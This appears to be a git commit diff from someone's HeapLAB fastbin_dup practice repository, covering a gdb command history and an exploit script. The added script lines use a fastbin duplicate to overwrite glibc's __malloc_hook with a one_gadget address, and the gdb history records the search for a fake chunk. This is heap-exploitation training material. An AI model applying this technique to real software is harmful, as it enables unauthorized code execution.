summaryrefslogtreecommitdiff
path: root/HeapLAB
diff options
context:
space:
mode:
Diffstat (limited to 'HeapLAB')
-rw-r--r--HeapLAB/challenge-fastbin_dup/.gdb_history130
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py7
2 files changed, 71 insertions, 66 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
index 4933f78..7bd5bb8 100644
--- a/HeapLAB/challenge-fastbin_dup/.gdb_history
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -1,68 +1,3 @@
-c
-x 0x7f4854db6b40
-c
-x 0x7f4854db6b40
-x main_arena
-x &main_arena
-x &__malloc_hook
-x main_arena.top
-db main_arena.top
-c
-c
-c
-q
-print __malloc_hook
-print __malloc_hook
-fastbins
-c
-fastbins
-c
-vis_heap_chunks
-c
-fastbins
-r
-c
-fastbins
-print main_arena
-vis_heap
-c
-fastbins
-fastbins
-c
-fastbins
-r
-c
- quit
-db main_arena
-db &main_arena.fastbinsY
-q
-r
-c
-c
-fastbins
-print &main_arena
-print main_arena
-c
-print main_arena
-db main_arena
-db &main_arena
-db &main_arena/100
-db &main_arena 100
-db &main_arena 1000
-q
-db main_arena.bins
-db &main_arena.fastbinsY
-run
-c
-c
-q
-r
-c
-fastbins
-c
-fastbins
-c
-fastbins
r
c
c
@@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)
+exit
+quit
+x rsp
+print $rsp+50
+print $rsp
+print $*rsp
+print $rsp
+print (void*)$rsp
+print (void*)$rsp+50
+print (void*)*$rsp+50
+print (void*)&$rsp+50
+x 0x7ffc1644e71a
+print (void*)&$rsp+50
+print (void*)$rsp+50
+print (void*)$rsp+0x50
+x 0x7ffc1644e738
+quit
+q
+print main_arena
+find_fake_fast &__malloc_hook
+q
+quit
+fastbins
+find_fake_fast &__malloc_hook
+print (void*)&__malloc_hook
+q
+x &__malloc_hook
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (17*8)
+db &__malloc_hook-(16) (18*8)
+db &__malloc_hook-(16) (19*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+db &__malloc_hook-(16) (16*8)
+db &__malloc_hook-(16) (20*8)
+quit
+db &__malloc_hook-(16) (20*8)
+find_fake_fast &__malloc_hook
+db 0x7fd4a6cf7b2d-(16) (20*8)
+q
+print main_arena
+vis_heap_chunks
+db 0x7f37a78ddb7d-(16) (20*8)
+db 0x7f37a78ddb7d-(32) (20*8)
+quit
+db 0x7f37a78ddb7d-(32) (20*8)
+db main_arena.top-(32) (20*8)
+search 0x7f323f6f0fa1
+search 0x7f323f6f0fa1
+search --help
+search --qword 0x7f323f6f0fa1
+search -p 0x7f323f6f0fa1
+search -p 0x0fa1
+search -p 0xa10f
+search -hexp 0x7f323f6f0fa1
+search --hex 0x7f323f6f0fa1
+search --hex 7f323f6f0fa1
+search --hex -8 7f323f6f0fa1
+search -8 --hex 7f323f6f0fa1
+search -t qword --hex 7f323f6f0fa1
+search -t qword -x 7f323f6f0fa1
+search -t qword -x 0x7f323f6f0fa1
+search -t qword 0x7f323f6f0fa1
+quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 56b0c71..df54957 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -74,9 +74,14 @@ malloc(119, 'sdfg')
#8 * 9
-payload_loc = libc.sym.__malloc_hook - 35
+payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
malloc(119, p64(0)*9 + p64(payload_loc))
+#we now have things in place and shit
+onegadget = libc.address + 0xe1fa1
+malloc(72, p64(0)*(35) + p64(onegadget))
+
+print("onegadget: {}".format(hex(onegadget)))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================